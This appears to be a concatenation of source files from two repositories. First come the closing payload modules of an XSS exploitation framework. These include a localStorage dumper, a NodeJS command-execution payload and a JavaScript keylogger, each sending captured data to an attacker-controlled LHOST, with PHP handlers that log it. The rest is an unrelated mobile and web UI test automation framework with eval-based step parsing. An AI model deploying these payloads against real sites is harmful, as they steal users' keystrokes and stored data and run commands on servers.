$ip = $_SERVER['REMOTE_ADDR'];
}
$storage_dump_line = sprintf("\n[*] Host: %s \n[*] Storage: %s\n\n", $ip, $_GET['localStorage']);
$f=fopen("LOGFILE","a+");
fwrite($f, $storage_dump__line);
fclose($f);
?>
"""
|
redcode-labs/poXSSon | payloads/cmd_exec.py | #!/usr/bin/python3.7
import socket
def local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except:
return "N/A"
name="cmd_exec"
description="Executes command using NodeJS's execSync function"
options = [["LHOST", "Host with listening handler", local_ip()],
["CMD", "Command to execute", "ls"]]
handler_options = [["LOGFILE", "File to store logged data", "cmd_output.txt"]]
payload = """
const execSync = require('child_process').execSync;
const output = execSync('CMD', { encoding: 'utf-8' });
const executed_command = 'CMD';
new Image().src = "http://LHOST:8000/handler.php?output="+output+"?executed_command="+executed_command;
"""
handler = """
<?php
$f=fopen("LOGFILE","a+");
fwrite($f, sprintf("\n[*] Command: %s\n[*] Output: %s", $_GET['executed_command'], $_GET['output']);
fclose($f);
?>
"""
|
redcode-labs/poXSSon | payloads/keylogger.py | #!/usr/bin/python3.7
import socket
import http.server
def local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except:
return "N/A"
name="keylogger"
description="Captures keystrokes and sends them to an external host"
options = [["LHOST", "Host to send captured strokes to", local_ip()],
["INTERVAL", "Number of seconds after which captured keystrokes are sent", "1"]]
handler_options = [["LOGFILE", "File to write keystrokes to", "keystrokes.txt"]]
payload = """
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://LHOST:8000/handler.php?c='+keys;
keys = '';
}, INTERVAL*1000);
"""
handler = """
<?php
shell_exec("ls");
if(!empty($_GET['c'])) {
$f=fopen("LOGFILE","a+");
fwrite($f,$_GET['c']);
fclose($f);
}
?>
"""
|
Hanlen520/fasttest | fasttest/keywords/keywords.py | <reponame>Hanlen520/fasttest<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def return_keywords(driver):
keywords_common = [
"click", # 点击
"check", # 检查
"sleep", # 等待
"setVar", # 设置全局变量
"break",
"$.getText", # 获取文案
"$.id",
"$.getVar", # 获取全局变量
"$.getElement", # 获取元素
"$.getElements", # 获取元素
"$.getLen", # 获取长度
"$.isExist", # 是否存在
"$.isNotExist", # 不存在
"while",
"for",
"if",
"elif",
"else",
"assert",
"setTimeout",
"call",
"variable"
]
keywords_app= [
"installApp", # 安装app
"uninstallApp", # 卸载app
"launchApp", # 启动app
"closeApp", # 关闭app
"tap", # 点击
"doubleTap", # 双击
"press", # 长按
"goBack", # 返回
"adb", # adb
"swipe", # 滑动
"input", # 输入
"ifiOS",
"ifAndroid"
]
keywords_web = [
"openUrl", # 打开地址
"close", # 关闭标签页或窗口
"submit", # 提交表单
"back", # 后退
"forward", # 前进
"refresh", # 刷新
"queryDisplayed", # 等待元素可见
"queryNotDisplayed", # 等待元素不可见
"contextClick", # 右击
"doubleClick", # 双击
"holdClick", # 按下鼠标左键
"dragDrop", # 鼠标拖放
"dragDropByOffset", # 拖动元素到某个位置
"moveByOffset", # 鼠标从当前位置移动到某个坐标
"moveToElement", # 鼠标移动
"moveToElementWithOffset", #移动到距某个元素(左上角坐标)多少距离的位置
"sendKeys", # 输入
"clear", # 清除
"maxWindow", # 窗口最大化
"minWindow", # 窗口最小化
"fullscreenWindow", # 全屏窗口
"deleteAllCookies", # 删除所有cookies
"deleteCookie", # 删除指定cookies
"addCookie", # 添加cookies
"switchToFrame", # 切换到指定frame
"switchToDefaultContent", # 切换到主文档
"switchToParentFrame", # 切回到父frame
"switchToWindow", # 切换句柄
"setWindowSize", # 设置窗口大小
"setWindowPosition", # 设置设置窗口位置
"executeScript", # 执行JS
"matchImage", # 匹配图片
"$.executeScript", # 获取JS执行结果
"$.saveScreenshot", # 截图
"$.isSelected", # 判断是否选中
"$.isDisplayed", # 判断元素是否显示
"$.isEnabled", # 判断元素是否被使用
"$.getSize", # 获取元素大小
"$.getLocation", # 获取元素坐标
"$.getRect", # 获取元素位置大小
"$.getAttribute", # 获取元素属性
"$.getTagName", # 获取元素tag Name
"$.getCssProperty", # 获取元素css
"$.getName", # 获取浏览器名字
"$.getTitle", # 获取标题
"$.getCurrentUrl", # 获取当前页面url
"$.getCurrentWindowHandle", # 获取当前窗口句柄
"$.getWindowHandles", # 获取所有窗口句柄
"$.getCookies", # 获取所有cookie
"$.getCookie", # 获取指定cookie
"$.getWindowPosition", # 获取窗口坐标
"$.getWindowSize", # 获取窗口大小
]
if driver != 'selenium':
keywords = list(set(keywords_common).union(set(keywords_app)))
else:
keywords = list(set(keywords_common).union(set(keywords_web)))
return keywords
|
Hanlen520/fasttest | fasttest/fasttest_runner.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import getopt
import traceback
from concurrent import futures
from fasttest.version import VERSION
from fasttest.project import *
def _usage():
print('')
print(' usage: fasttest [-h|-v|] [arg] ...')
print('')
print(' options:')
print('')
print(' -h, --help show help screen and exit.')
print(' -V, --Version show version.')
print(' -i, --init specify a project name and create the project.')
print(' -r, --run specify the project path and run the project.')
print(' -w, --workers specify number of threads.')
print('')
sys.exit()
def _init_project(dir):
try:
if not dir:
print('Please enter a project name...')
sys.exit()
dirs = ['Common/Android', 'Common/iOS', 'Common/Selenium', 'Resource', 'Scripts', 'TestCase']
for dir_ in dirs:
path = os.path.join(dir, dir_)
print('create directory: {}'.format(path))
os.makedirs(path)
config_path = os.path.join(dir, 'config.yaml')
with open(config_path, "w") as f:
print('create file: {}'.format(config_path))
config = "driver: 'appium'\n" \
"reStart: True\n" \
"saveScreenshot: False\n" \
"timeOut: 10\n" \
"desiredCapabilities:\n" \
" platformName: 'Android'\n" \
" udid: 'device_id'\n" \
" appPackage: 'com.android.mobile'\n" \
" appActivity: 'com.android.mobile.Launcher'\n" \
" automationName: 'Appium'\n" \
" deviceName: 'HUWWEI P40 Pro'\n" \
" noReset: True\n" \
"testcase:\n" \
" - TestCase/case.yaml"
f.write(config)
data_path = os.path.join(dir, 'data.yaml')
with open(data_path, 'w') as f:
print('create file: {}'.format(data_path))
config = "variable:\n" \
" userid: 'admin'\n" \
" password: '<PASSWORD>'\n" \
"resource:\n" \
" logo: 'Resource/logo.png'\n" \
"keywords:\n" \
" - 'ScriptsTest'\n"
f.write(config)
common_path = os.path.join(dir, 'Common', 'common.yaml')
with open(common_path, "w") as f:
print('create file: {}'.format(common_path))
common = "CommonTest:\n" \
" description: 'common test'\n" \
" input: [value]\n" \
" output: []\n" \
" steps:\n" \
" - for ${i} in ${value}:\n" \
" - if ${i} == 3:\n" \
" - break"
f.write(common)
case_path = os.path.join(dir, 'TestCase', 'case.yaml')
with open(case_path, "w") as f:
print('create file: {}'.format(case_path))
case = "module: test_module\n" \
"skip: False\n" \
"description: 'this is a test case'\n" \
"steps:\n" \
" - ${t1} = $.id(1+2*3)\n\n" \
" - ${t2} = 6\n\n" \
" - assert ${t1} > ${t2}\n\n" \
" - ${ls} = ScriptsTest(${t2})\n\n" \
" - call CommonTest(${ls})"
f.write(case)
scripts_path = os.path.join(dir, 'Scripts', 'case.py')
with open(scripts_path, "w") as f:
print('create file: {}'.format(scripts_path))
scripts = '#!/usr/bin/env python3\n' \
'# -*- coding: utf-8 -*-\n\n' \
'def ScriptsTest(value):\n\n' \
' return [1,2,3,4,5,value]'
f.write(scripts)
print('create project successfully.')
except Exception as e:
raise e
def _start_project(workers, path):
if workers <= 1:
project = Project(path=path)
result = project.start()
return result
else:
result_list = []
with futures.ThreadPoolExecutor() as t:
worker_list = []
for index in range(workers):
run_info = {
'index': index,
'workers': workers,
'path': path
}
worker_list.append(t.submit(_run_project, run_info))
for f in futures.as_completed(worker_list):
if f.result() is not None:
result = f.result()
result_list.append(result)
if f.exception():
print(f.exception())
return result_list
def _run_project(run_info):
try:
index = run_info['index']
workers = run_info['workers']
path = run_info['path']
project = Project(index=index, workers=workers, path=path)
result = project.start()
return result
except Exception as e:
traceback.print_exc()
return None
def main():
'''
:return:
'''
try:
opts, args = getopt.getopt(sys.argv[1:], 'hVi:r:w:', ['help', 'Version', 'init=', 'run=', 'workers='])
except:
_usage()
project_path = '.'
workers = 1
for o, a in opts:
if o in ('-h', '--help'):
_usage()
elif o in ('-V', '--Version'):
print(VERSION)
sys.exit()
elif o in ('-i', '--init'):
_init_project(a)
sys.exit()
elif o in ('-r', '--run'):
project_path = a
elif o in ('-w', '--workers'):
workers = int(a)
else:
_usage()
if not os.path.isdir(project_path):
print('No such directory: {}'.format(project_path))
_usage()
start_time = time.time()
result = _start_project(workers, project_path)
end_time = time.time()
print('run time: {}s'.format(int(end_time-start_time)))
if isinstance(result, list):
for r in result:
print('\n')
for k, v in r.items():
if k == 'result':
continue
print('{}: {}'.format(k, v))
else:
for k, v in result.items():
if k == 'result':
continue
print('{}: {}'.format(k, v))
if __name__ == '__main__':
main() |
Hanlen520/fasttest | fasttest/runner/run_case.py | <reponame>Hanlen520/fasttest
from fasttest.common import Var
from fasttest.runner.test_case import TestCase
from fasttest.drivers.driver_base_app import DriverBaseApp
from fasttest.drivers.driver_base_web import DriverBaseWeb
from fasttest.runner.case_analysis import CaseAnalysis
class RunCase(TestCase):
def setUp(self):
if self.skip:
self.skipTest('skip')
if Var.re_start:
if Var.driver != 'selenium':
DriverBaseApp.launch_app(None)
else:
DriverBaseWeb.createSession()
def testCase(self):
case = CaseAnalysis()
case.iteration(self.steps)
def tearDown(self):
if Var.re_start:
try:
if Var.driver != 'selenium':
DriverBaseApp.close_app(None)
else:
DriverBaseWeb.quit()
except:
pass
|
Hanlen520/fasttest | fasttest/result/html_result.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import sys
import time
import shutil
class Template_mixin(object):
"""
Define a HTML template for report customerization and generation.
Overall structure of an HTML report
HTML
+------------------------+
|<html> |
| <head> |
| |
| STYLESHEET |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </head> |
| |
| <body> |
| |
| HEADING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| REPORT |
| +----------------+ |
| | | |
| +----------------+ |
| |
| ENDING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </body> |
|</html> |
+------------------------+
"""
HTML_TMPL = r'''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>测试报告</title>
<link rel="stylesheet" type="text/css" href="resource/css.css">
<script type="text/javascript" src="http://libs.baidu.com/jquery/2.1.1/jquery.min.js"></script>
<script src="resource/js.js"></script>
</head>
<body>
<div class="root">
{heading}
{tabdiv}
</div>
</body>
</html>
'''
# 测试汇总
HEADING_TMPL = r'''
<div class="result_css_title">
<h2 style="color: white;text-align: center;line-height: 65px">{title}</h2>
</div>
<div class="result_css_head" style="height: 240px">
<div class="result_css_head_title">Summarization</div>
<div style="height: 210px;border: 1px solid rgb(220,220,220); background-color: white">
<p class="result_css_text">Total:{total}</p>
<p class="result_css_text">Success:{success}</p>
<p class="result_css_text">Failure:{failure}</p>
<p class="result_css_text">Error:{error}</p>
<p class="result_css_text">Skipped:{skipped}</p>
<p class="result_css_text">StartTime:{startTime}</p>
<p class="result_css_text">Duration:{duration}</p>
</div>
</div>
'''
# 详细数据
TABDIV_TMPL = r'''
<div class="result_css_tabdiv" style="height: auto">
<div class="result_css_head_title">Details</div>
<div style="height:auto;border: 1px solid rgb(220,220,220); background-color: white">
<table class="result_css_table" cellspacing="0">
<tr>
<th class="result_css_th" width="20%%">CaseName</th>
<th class="result_css_th" width="30%%">Description</th>
<th class="result_css_th" width="20%%">StartTime</th>
<th class="result_css_th" width="10%%">Duration</th>
<th class="result_css_th" width="10%%">Status</th>
<th class="result_css_th" width="10%%">Open/Close</th>
</tr>
{trlist}
</table>
</div>
</div>
'''
# module_name
MODULE_NAME = r'''
<tr>
<td class="result_css_module_td" colspan="2" style=" text-align:left; text-indent: 10px;">{module_name}</td>
<td class="result_css_module_td" colspan="3"><span class="result_css_success result_css_status"> success:{success} </span> | <span class="result_css_failure result_css_status"> failure:{failure} </span> | <span class="result_css_error result_css_status"> error:{error} </span> | <span class="result_css_skipped result_css_status"> skipped:{skipped} </span></td>
<td class="result_css_module_name" data-tag='module_name_{tag_module_name}'>Open</td>
</tr>
'''
# case
CASE_TMPL = r'''
<tr module-data-tag='module_name_{module_name}' style="display: none">
<td class="result_css_module_td result_css_{b_color}" style=" text-align:left; text-indent: 20px;">{casename}</td>
<td class="result_css_module_td result_css_{b_color}" style=" text-align:left; text-indent: 5px;">{description}</td>
<td class="result_css_module_td result_css_{b_color}">{startTime}</td>
<td class="result_css_module_td result_css_{b_color}">{duration}</td>
<td class="result_css_module_td result_css_{b_color}">{status}</td>
<td class="result_css_module_td_view result_css_{b_color}" data-tag='module_td_view_{module}_{dataId}'>Open</td>
</tr>
'''
# case details
CASE_DETA_NOT_SNAPSHOT = r'''
<tr module-td-data-tag="module_td_view_{module_name}_{dataId}" style="display: none">
<td class="result_css_module_deta" colspan="2" style="border-right: 0">
<div class="result_css_errordiv">
<h3 style="margin-bottom: 10px">Steps</h3>
<pre class="result_css_errorp" style="white-space: pre-wrap;overflow-wrap: break-word;margin-top: 0">{steplist}</pre>
</div>
</td>
<td class="result_css_module_deta" colspan="4">
<div class="result_css_errordiv">
<h3 style="margin-bottom: 10px">Logs</h3>
<pre class="result_css_errorp" style="white-space: pre-wrap;overflow-wrap: break-word;margin-top: 0">{errlist}</pre>
</div>
</td>
</tr>
'''
CASE_DETA_SNAPSHOT = r'''
<tr module-td-data-tag="module_td_view_{module_name}_{dataId}" style="display: none">
<td class="result_css_module_deta" colspan="6" style="border-right: 0">
<div class="result_css_errordiv">
<h3 style="margin-bottom: 10px">Steps</h3>
{steplist}
</div>
</td>
</tr>
'''
CASE_SNAPSHOT_DIV = r'''
<div class="result_css_Stepsdetails">
<div class="result_css_steps" style="display: inline-block">
<pre class="result_css_StepsdetailsPre_duration">{runtime} | </pre>
<pre class="result_css_StepsdetailsPre {status}">{steps}</pre>
</div>
<div class="img_errorp" style="display: none;">
<img class="result_css_img" src="{image}">
</div>
</div>
'''
CASE_NOT_SNAPSHOT_DIV = r'''
<div class="result_css_Stepsdetails">
<div class="result_css_steps" style="display: inline-block">
<pre class="result_css_StepsdetailsPre_duration">{runtime} | </pre>
<pre class="result_css_StepsdetailsPre {status}">{steps}</pre>
</div>
</div>
'''
CASE_ERROR_DIV = r'''
<div class="result_css_Stepsdetails">
<div class="result_css_steps" style="display: inline-block">
<pre class="result_css_StepsdetailsPre_duration">{runtime} | </pre>
<pre class="result_css_StepsdetailsPre {status}">{steps}</pre>
</div>
<div class="img_errorp" style="display: none;">
<img class="result_css_img" src="{image}">
<pre class="result_css_errorp" style="white-space: pre-wrap;overflow-wrap: break-word;">{errlist}</pre>
</div>
</div>
'''
CASE_NOT_ERROR_DIV = r'''
<div class="result_css_Stepsdetails">
<div class="result_css_steps" style="display: inline-block">
<pre class="result_css_StepsdetailsPre_duration">{runtime} | </pre>
<pre class="result_css_StepsdetailsPre {status}">{steps}</pre>
</div>
<div class="img_errorp" style="display: none;">
<pre class="result_css_errorp" style="white-space: pre-wrap;overflow-wrap: break-word;">{errlist}</pre>
</div>
</div>
'''
DEFAULT_TITLE = 'Unit Test Report'
DEFAULT_DESCRIPTION = ''
class HTMLTestRunner(Template_mixin):
def __init__(self, stream=sys.stdout, verbosity=1, title=None, description=None):
self.stream = stream
self.verbosity = verbosity
self.title = title if title else self.DEFAULT_TITLE
self.description = description if description else self.DEFAULT_DESCRIPTION
def generate_report(self, result):
heading = self._generate_heading(result)
report = self._generate_tabdiv(result)
tabdiv = self.TABDIV_TMPL.format(
trlist = report
)
output = self.HTML_TMPL.format(
heading = heading,
tabdiv = tabdiv
)
resource = os.path.join(os.path.split(os.path.abspath(__file__))[0], "resource")
shutil.copy(os.path.join(resource,"css.css"), os.path.join(result.report,'resource'))
shutil.copy(os.path.join(resource,"js.js"), os.path.join(result.report,'resource'))
self.stream.write(output.encode('utf-8'))
def _generate_heading(self, report):
if report:
heading = self.HEADING_TMPL.format(
title = self.title,
total = report.total,
success = report.successes,
failure = report.failures,
error = report.errors,
skipped = report.skipped,
startTime = report.startTime,
duration = report.duration
)
return heading
def _generate_tabdiv(self, result):
'''
解析结果
:param result:
:return:
'''
table_lsit = []
for module_name, module_list in result.result.items():
success = 0
failure = 0
error = 0
skipped = 0
cls_list = []
for test_info in module_list:
# case模块
case_module = self._generate_case(test_info)
cls_list.append(case_module)
# 具体case
status = test_info.status
if status != 3: # skip
case_deta = self._generate_case_deta(test_info)
cls_list.append(case_deta)
# 统计结果
if status == 0:
success += 1
elif status == 1:
failure += 1
elif status == 2:
error += 1
elif status == 3:
skipped += 1
module_name = self.MODULE_NAME.format(
module_name = module_name,
success = success,
failure = failure,
error = error,
skipped = skipped,
tag_module_name = module_name
)
table_lsit.append(module_name)
for tr in cls_list:
table_lsit.append(tr)
tr_ = ''
for tr in table_lsit:
tr_ = tr_ + tr
return tr_
def _generate_case(self, test_info):
'''
module 样式
:param testinfo:
:return:
'''
status_list = ['success', 'failure', 'error', 'skipped']
casename = test_info.caseName
status = status_list[test_info.status]
description = test_info.description
startTime = test_info.startTime
duration = test_info.duration
dataId = test_info.dataId
module_name = test_info.moduleName
caseinfo = self.CASE_TMPL.format(
module_name=module_name,
casename=casename,
description=description,
startTime=startTime,
duration=duration,
status=status,
module=module_name,
dataId=dataId,
b_color=status
)
return caseinfo
def _generate_case_deta(self, test_info):
'''
具体case
:param testinfo:
:return:
'''
dataId = test_info.dataId
module_name = test_info.moduleName
err = '\n' + test_info.err if test_info.err else 'Nothing'
steps = ""
if os.path.exists(test_info.snapshotDir):
for key in sort_string(test_info.steps):
value = test_info.steps[key]
run_time = value['duration']
step = value['step'].replace('\n', '')
if value['result'] != '':
step = '{} --> {}'.format(value['step'], value['result']).replace('\n', '')
image_path = value['snapshot'].split(test_info.report)[-1]
image_path = image_path.lstrip(os.sep)
if value['status']:
if os.path.isfile(value['snapshot']):
case_snapshot = self.CASE_SNAPSHOT_DIV.format(
status='result_css_successfont',
runtime=run_time,
steps=step,
image=image_path
)
else:
case_snapshot = self.CASE_NOT_SNAPSHOT_DIV.format(
status='result_css_successfont',
runtime=run_time,
steps=step
)
else:
if os.path.isfile(value['snapshot']):
case_snapshot = self.CASE_ERROR_DIV.format(
status='result_css_errorfont',
runtime=run_time,
steps=step,
image=image_path,
errlist=err
)
else:
case_snapshot = self.CASE_NOT_ERROR_DIV.format(
status='result_css_errorfont',
runtime=run_time,
steps=step,
errlist=err
)
steps = steps + case_snapshot
casedeta = self.CASE_DETA_SNAPSHOT.format(
module_name=module_name,
dataId=dataId,
steplist=steps,
)
else:
casedeta = self.CASE_DETA_NOT_SNAPSHOT.format(
module_name=module_name,
dataId=dataId,
steplist=steps,
errlist=err
)
return casedeta
def embedded_numbers(s):
'''
:param s:
:return:
'''
re_digits = re.compile(r'(\d+)')
pieces = re_digits.split(s)
pieces[1::2] = map(int,pieces[1::2])
return pieces
def sort_string(lst):
return sorted(lst,key=embedded_numbers)
|
Hanlen520/fasttest | fasttest/drivers/appium/__init__.py | <reponame>Hanlen520/fasttest
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from fasttest.drivers.appium.driver_appium import AndroidDriver, iOSDriver
__all__ = ['AndroidDriver','iOSDriver']
|
Hanlen520/fasttest | fasttest/utils/devices_utils.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import platform
class DevicesUtils(object):
def __init__(self, platformName, udid):
self._platformName = platformName
self._udid = udid
def device_info(self):
if self._platformName.lower() == 'android':
devices = self.get_devices()
if self._udid and (self._udid not in devices):
raise Exception("device {} not found!".format(self._udid))
elif not self._udid and devices:
self._udid = devices[0]
elif not self._udid:
raise Exception("Can‘t find device!")
if platform.system() == "Windows":
pipe = os.popen("adb -s {} shell getprop | findstr product".format(self._udid))
else:
pipe = os.popen("adb -s {} shell getprop | grep product".format(self._udid))
result = pipe.read()
manufacturer = "None" if not result else \
re.search(r"\[ro.product.manufacturer\]:\s*\[(.[^\]]*)\]", result).groups()[0]
model = "None" if not result else \
re.search(r"\[ro.product.model\]:\s*\[(.[^\]]*)\]", result).groups()[0].split()[-1]
device_type = "{}_{}".format(manufacturer, model).replace(" ", "_")
elif self._platformName.lower() == 'ios':
devices = self.get_devices('idevice_id -l')
simulator_devices = self.get_devices('instruments -s Devices')
if self._udid and (self._udid not in (devices or simulator_devices)):
raise Exception("device {} not found!".format(self._udid))
elif not self._udid and devices:
self._udid = devices[0]
elif not self._udid:
raise Exception("Can‘t find device!")
if self._udid in devices:
DeviceName = os.popen('ideviceinfo -u {} -k DeviceName'.format(self._udid)).read()
if not DeviceName:
DeviceName = 'iOS'
device_type = DeviceName.replace(' ', '_')
else:
device_type = self._platformName
else:
raise Exception("Test Platform must be Android or iOS!")
return self._udid,device_type
def get_devices(self,cmd=''):
if self._platformName.lower() == 'android':
pipe = os.popen("adb devices")
deviceinfo = pipe.read()
devices = deviceinfo.replace('\tdevice', "").split('\n')
devices.pop(0)
while "" in devices:
devices.remove("")
else:
pipe = os.popen(cmd)
deviceinfo = pipe.read()
r = re.compile(r'\[(.*?)\]', re.S)
devices = re.findall(r, deviceinfo)
devices = devices if devices else deviceinfo.split('\n')
while "" in devices:
devices.remove("")
return devices
|
Hanlen520/fasttest | fasttest/runner/action_executor_base.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import copy
from typing import Iterable
from fasttest.common import Var, log_info, log_error
class ActionExecutorBase(object):
def _import(self):
file_list = []
try:
for rt, dirs, files in os.walk(os.path.join(Var.root, "Scripts")):
for f in files:
if f == "__init__.py" or f.endswith(".pyc") or f.startswith(".") or not f.endswith('.py'):
continue
file_list.append(f'from Scripts.{f[:-3]} import *')
except Exception as e:
log_error(' {}'.format(e), False)
return file_list
def _out(self, key, result):
if isinstance(result, list):
log_info(f' <-- {key}: {type(result)}')
for l in result:
log_info(' - {}'.format(l))
elif isinstance(result, dict):
log_info(f' <-- {key}: {type(result)}')
for k, v in result.items():
log_info(' - {}: {}'.format(k, v))
else:
log_info(f' <-- {key}: {type(result)} {result}')
def _getParms(self, action, index=0, ignore=False):
parms = action.parms
if len(parms) <= index or not len(parms):
if ignore:
return None
raise TypeError('missing {} required positional argument'.format(index + 1))
value = parms[index]
return value
def _sleep(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
time.sleep(float(parms))
return
def _setVar(self, action):
'''
:param action:
:return:
'''
key = self._getParms(action, 0)
values = self._getParms(action, 1)
Var.global_var[key] = values
return
def _getVar(self, action):
'''
:param action:
:return:
'''
key = self._getParms(action, 0)
if Var.global_var:
if key in Var.global_var:
result = Var.global_var[key]
else:
result = None
else:
result = None
return result
def _getLen(self, action):
'''
:param action:
:return:
'''
value = self._getParms(action, 0)
if value:
return len(value)
return 0
def _break(self, action):
'''
:param action:
:return:
'''
return True
def _if(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
try:
parms = parms.replace('\n', '')
result = eval(parms)
log_info(' <-- {}'.format(bool(result)))
return bool(result)
except Exception as e:
raise e
def _elif(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
try:
parms = parms.replace('\n', '')
result = eval(parms)
log_info(' <-- {}'.format(bool(result)))
return bool(result)
except Exception as e:
raise e
def _else(self, action):
'''
:param action:
:return:
'''
return True
def _while(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
try:
parms = parms.replace('\n', '')
result = eval(parms)
log_info(' <-- {}'.format(bool(result)))
return bool(result)
except Exception as e:
raise e
def _for(self, action):
'''
:param action:
:return:
'''
items = self._getParms(action, 0)
value = action.value
if not isinstance(items, Iterable):
raise TypeError("'{}' object is not iterable".format(items))
return {'key': value, 'value': items}
def _assert(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
try:
parms = parms.replace('\n', '')
result = eval(parms)
log_info(' <-- {}'.format(bool(result)))
assert result
except Exception as e:
raise e
def _setTimeout(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
Var.time_out = int(parms)
def _id(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
parms = parms.replace('\n', '')
result = eval(parms)
return result
def _call(self, action):
'''
:param action:
:return:
'''
parms = action.parms
func = action.func
if not func in Var.common_func.keys():
raise NameError("name '{}' is not defined".format(func))
if len(Var.common_func[func].input) != len(parms):
raise TypeError('{}() takes {} positional arguments but {} was given'.format(func, len(
Var.common_func[func].input), len(parms)))
common_var = dict(zip(Var.common_func[func].input, parms))
try:
from fasttest.runner.case_analysis import CaseAnalysis
case = CaseAnalysis()
case.iteration(Var.common_func[func].steps, '{} '.format(action.style), common_var)
except Exception as e:
# call action中如果某一句step异常,此处会往上抛异常,导致call action也是失败状态,需要标记
Var.exception_flag = True
raise e
def _variable(self, action):
'''
调用$.类型方法
:param action:
:return:
'''
try:
func = action.func
if func and func.startswith('$.'):
func_ = getattr(self, '_{}'.format(func[2:]))
result = func_(action)
elif func:
new_action = action.copy() #todo
new_action['key'] = action.func
result = self._new_action_executo(new_action)
else:
result = self._getParms(action, 0)
except Exception as e:
raise e
self._out(action.name, result)
return result
def _action_executor(self, action):
'''
默认关键字
:param action:
:return:
'''
try:
func = getattr(self, '_{}'.format(action.key))
except Exception as e:
raise NameError("keyword '{}' is not defined".format(action.key))
result = func(action)
return result
def _new_action_executo(self, action, output=True):
'''
自定义关键字
:param action:
:return:
'''
list = self._import()
for l in list:
exec(l)
parms = None
for index, par in enumerate(action.parms):
if not parms:
parms = 'action.parms[{}]'.format(index)
continue
parms = '{}, action.parms[{}]'.format(parms, index)
if not parms:
result = eval('locals()[action.key]()')
else:
result = eval('locals()[action.key]({})'.format(parms))
if result and output:
self._out(action.key, result)
return result
|
Hanlen520/fasttest | fasttest/utils/yaml_utils.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import yaml
from fasttest.common import Dict
def analytical_file(path):
'''
analytical file
:param path:
:return:
'''
with open(path, "r", encoding='utf-8') as f:
yaml_data = yaml.load(f, Loader=yaml.FullLoader)
yaml_dict = Dict()
if yaml_data:
for key, value in yaml_data.items():
yaml_dict[key] = value
return yaml_dict
|
Hanlen520/fasttest | fasttest/project.py | <reponame>Hanlen520/fasttest<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import time
import math
import unittest
import threading
from fasttest.common import *
from fasttest.utils import *
from fasttest.keywords import keywords
from fasttest.runner.run_case import RunCase
from fasttest.drivers.driver_base_app import DriverBaseApp
from fasttest.drivers.driver_base_web import DriverBaseWeb
from fasttest.result.test_runner import TestRunner
class Project(object):
def __init__(self, index=0, workers=1, path='.'):
self._index = index
self._workers = workers
self._root = path
self._init_project()
self._init_config()
self._init_logging()
self._analytical_testcase_file()
self._analytical_common_file()
self._init_data()
self._init_testcase_suite()
def _init_project(self):
if not os.path.isdir(self._root):
raise Exception('No such directory: {}'.format(self._root))
if self._root == '.':
self._root = os.getcwd()
Var.root = self._root
sys.path.append(Var.root)
sys.path.append(os.path.join(Var.root, 'Scripts'))
Var.global_var = Dict()
Var.extensions_var = Dict()
Var.common_var = Dict()
Var.common_func = Dict()
def _init_config(self):
self._config = analytical_file(os.path.join(Var.root, 'config.yaml'))
Var.driver = self._config.driver
Var.re_start = self._config.reStart
Var.save_screenshot = self._config.saveScreenshot
Var.time_out = self._config.timeOut
Var.test_case = self._config.testcase
Var.desired_caps = Dict()
for configK, configV in self._config.desiredCapabilities.items():
Var.desired_caps[configK] = configV
if not Var.driver or Var.driver.lower() not in ['appium', 'macaca', 'selenium']:
raise ValueError('Missing/incomplete configuration file: config.yaml, No driver type specified.')
if not Var.time_out or not isinstance(Var.time_out, int):
Var.time_out = 10
if Var.driver != 'selenium':
if not Var.desired_caps.platformName:
raise ValueError('Missing/incomplete configuration file: config.yaml, No platformName type specified.')
DriverBaseApp.init()
else:
if not Var.desired_caps.browser or Var.desired_caps.browser not in ['chrome', 'safari', 'firefox', 'ie', 'opera', 'phantomjs']:
raise ValueError('browser parameter is illegal!')
def _init_logging(self):
if Var.driver != 'selenium':
# 重置udid
if self._workers > 1:
if isinstance(Var.desired_caps.udid, list):
if not Var.desired_caps.udid:
raise Exception('Can‘t find device, udid("{}") is empty.'.format(Var.desired_caps.udid))
if self._index >= len(Var.desired_caps.udid):
raise Exception('the number of workers is larger than the list of udid.')
if not Var.desired_caps.udid[self._index]:
raise Exception('Can‘t find device, udid("{}") is empty.'.format(Var.desired_caps.udid[self._index]))
devices = DevicesUtils(Var.desired_caps.platformName, Var.desired_caps.udid[self._index])
Var.desired_caps['udid'], info = devices.device_info()
else:
raise Exception('the udid list is not configured properly.')
else:
if isinstance(Var.desired_caps.udid, list):
if Var.desired_caps.udid:
devices = DevicesUtils(Var.desired_caps.platformName, Var.desired_caps.udid[0])
else:
devices = DevicesUtils(Var.desired_caps.platformName, None)
else:
devices = DevicesUtils(Var.desired_caps.platformName, Var.desired_caps.udid)
Var.desired_caps['udid'], info = devices.device_info()
else:
info = Var.desired_caps.browser
thr_name = threading.currentThread().getName()
report_time = time.strftime("%Y%m%d%H%M%S", time.localtime(time.time()))
report_child = "{}_{}_{}".format(info, report_time, thr_name)
Var.report = os.path.join(Var.root, "Report", report_child)
if not os.path.exists(Var.report):
os.makedirs(Var.report)
